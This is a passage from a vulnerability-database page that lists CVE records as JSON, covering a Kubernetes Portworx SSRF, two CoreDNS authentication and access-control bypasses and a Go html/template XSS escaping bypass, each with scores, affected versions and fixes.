"value": "CAPEC-664 Server Side Request Forgery"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-14T21:27:34.786Z",
"orgId": "a6081bf6-c852-4425-ad4f-a67919267565",
"shortName": "kubernetes"
},
"references": [
{
"tags": [
"issue-tracking"
],
"url": "https://github.com/kubernetes/kubernetes/issues/135525"
},
{
"tags": [
"mailing-list"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/EORqZg0k1l4/m/TtD-q0v7AgAJ"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "To mitigate this vulnerability, upgrade Kubernetes or\u0026nbsp;\u003cspan style=\"background-color: transparent;\"\u003eenable the CSIMigrationPortworx feature gate.\u003c/span\u003e"
}
],
"value": "To mitigate this vulnerability, upgrade Kubernetes or enable the CSIMigrationPortworx feature gate."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Portworx Half-Blind SSRF in kube-controller-manager",
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "a6081bf6-c852-4425-ad4f-a67919267565",
"assignerShortName": "kubernetes",
"cveId": "CVE-2025-13281",
"datePublished": "2025-12-14T21:27:34.786Z",
"dateReserved": "2025-11-16T20:53:36.588Z",
"dateUpdated": "2025-12-15T16:26:59.485Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-33190 (GCVE-0-2026-33190)
Vulnerability from cvelistv5 – Published: 2026-05-05 19:02 – Updated: 2026-05-06 12:47- CWE-303 - Incorrect Implementation of Authentication Algorithm
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33190",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-06T12:46:45.291268Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-06T12:47:07.338Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-qhmp-q7xh-99rh"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "coredns",
"vendor": "coredns",
"versions": [
{
"status": "affected",
"version": "\u003c 1.14.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the tsig plugin can be bypassed on non-plain-DNS transports (DoT, DoH, DoH3, DoQ, and gRPC) because it trusts the transport writer\u0027s TsigStatus() instead of performing verification itself. The DoH and DoH3 writer\u0027s TsigStatus() always returns nil, the DoT server does not set TsigSecret on the dns.Server, and the DoQ and gRPC writers also unconditionally return nil. This allows an unauthenticated remote client to bypass TSIG-based authentication and access resources intended to be restricted behind a tsig require all policy. Plain DNS over TCP and UDP are not affected. This issue has been fixed in version 1.14.3."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-303",
"description": "CWE-303: Incorrect Implementation of Authentication Algorithm",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T19:02:55.374Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coredns/coredns/security/advisories/GHSA-qhmp-q7xh-99rh",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-qhmp-q7xh-99rh"
},
{
"name": "https://github.com/coredns/coredns/releases/tag/v1.14.3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.3"
}
],
"source": {
"advisory": "GHSA-qhmp-q7xh-99rh",
"discovery": "UNKNOWN"
},
"title": "CoreDNS TSIG authentication bypass on encrypted DNS transports"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33190",
"datePublished": "2026-05-05T19:02:55.374Z",
"dateReserved": "2026-03-17T22:16:36.721Z",
"dateUpdated": "2026-05-06T12:47:07.338Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-26017 (GCVE-0-2026-26017)
Vulnerability from cvelistv5 – Published: 2026-03-06 15:36 – Updated: 2026-06-30 12:08- CWE-367 - Time-of-check Time-of-use (TOCTOU) Race Condition
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-26017",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-06T16:06:32.284525Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-06T16:06:41.093Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"affected": [
{
"cpes": [
"cpe:/a:redhat:acm:2.14::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Advanced Cluster Management for Kubernetes 2.14",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:acm:2.15::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Advanced Cluster Management for Kubernetes 2.15",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:connectivity_link:1"
],
"defaultStatus": "affected",
"product": "Red Hat Connectivity Link 1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift:4"
],
"defaultStatus": "unaffected",
"product": "Red Hat OpenShift Container Platform 4",
"vendor": "Red Hat"
}
],
"datePublic": "2026-03-06T15:36:15.655Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in CoreDNS, a DNS server that uses a chain of plugins. This logical vulnerability allows an attacker to bypass DNS access controls. The issue occurs because security plugins, such as \u0027acl\u0027, are evaluated before the \u0027rewrite\u0027 plugin, creating a Time-of-Check Time-of-Use (TOCTOU) flaw. This flaw enables an attacker to circumvent intended access restrictions."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-367",
"description": "Time-of-check Time-of-use (TOCTOU) Race Condition",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-30T12:08:13.703Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2026-26017"
},
{
"name": "RHBZ#2445244",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445244"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-26017.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:8151"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:25127: Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"lang": "en",
"value": "RHSA-2026:8151: Red Hat Advanced Cluster Management for Kubernetes 2.15"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-06T16:01:45.971Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-03-06T15:36:15.655Z",
"value": "Made public."
}
],
"title": "github.com/coredns/coredns: CoreDNS: DNS access control bypass due to plugin execution order flaw",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
}
],
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"product": "coredns",
"vendor": "coredns",
"versions": [
{
"status": "affected",
"version": "\u003c 1.14.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CoreDNS is a DNS server that chains plugins. Prior to version 1.14.2, a logical vulnerability in CoreDNS allows DNS access controls to be bypassed due to the default execution order of plugins. Security plugins such as acl are evaluated before the rewrite plugin, resulting in a Time-of-Check Time-of-Use (TOCTOU) flaw. This issue has been patched in version 1.14.2."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-367",
"description": "CWE-367: Time-of-check Time-of-use (TOCTOU) Race Condition",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-06T15:36:15.655Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coredns/coredns/security/advisories/GHSA-c9v3-4pv7-87pr",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-c9v3-4pv7-87pr"
},
{
"name": "https://github.com/coredns/coredns/releases/tag/v1.14.2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.2"
}
],
"source": {
"advisory": "GHSA-c9v3-4pv7-87pr",
"discovery": "UNKNOWN"
},
"title": "CoreDNS ACL Bypass"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-26017",
"datePublished": "2026-03-06T15:36:15.655Z",
"dateReserved": "2026-02-09T21:36:29.554Z",
"dateUpdated": "2026-06-30T12:08:13.703Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-39823 (GCVE-0-2026-39823)
Vulnerability from cvelistv5 – Published: 2026-05-07 19:41 – Updated: 2026-05-08 14:05- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Go standard library | html/template |
Affected:
0 , < 1.25.10
(semver)
Affected: 1.26.0-0 , < 1.26.3 (semver) |
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-39823",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-08T14:05:34.310805Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-08T14:05:55.152Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://pkg.go.dev",
"defaultStatus": "unaffected",
"packageName": "html/template",
"product": "html/template",
"programRoutines": [
{
"name": "tMetaContent"
},
{
"name": "Template.Execute"
},
{
"name": "Template.ExecuteTemplate"
}
],
"vendor": "Go standard library",
"versions": [
{
"lessThan": "1.25.10",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"lessThan": "1.26.3",
"status": "affected",
"version": "1.26.0-0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Samy Ghannad"
}
],
"descriptions": [
{
"lang": "en",
"value": "CVE-2026-27142 fixed a vulnerability in which URLs were not correctly escaped inside of a \u003cmeta\u003e tag\u0027s \u003ccontent\u003e attribute. If the URL content were to insert ASCII whitespaces around the \u0027=\u0027 rune inside of the \u003ccontent\u003e attribute, the escaper would fail to similarly escape it, leading to XSS."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-07T19:41:19.524Z",
"orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"shortName": "Go"
},
"references": [
{
"url": "https://go.dev/issue/78913"
},
{
"url": "https://go.dev/cl/769920"
},
{
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"url": "https://pkg.go.dev/vuln/GO-2026-4982"
}
],
"title": "Bypass of meta content URL escaping causes XSS in html/template"
}
},
"cveMetadata": {
"assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"assignerShortName": "Go",
"cveId": "CVE-2026-39823",
"datePublished": "2026-05-07T19:41:19.524Z",
"dateReserved": "2026-04-07T18:13:03.527Z",
"dateUpdated": "2026-05-08T14:05:55.152Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.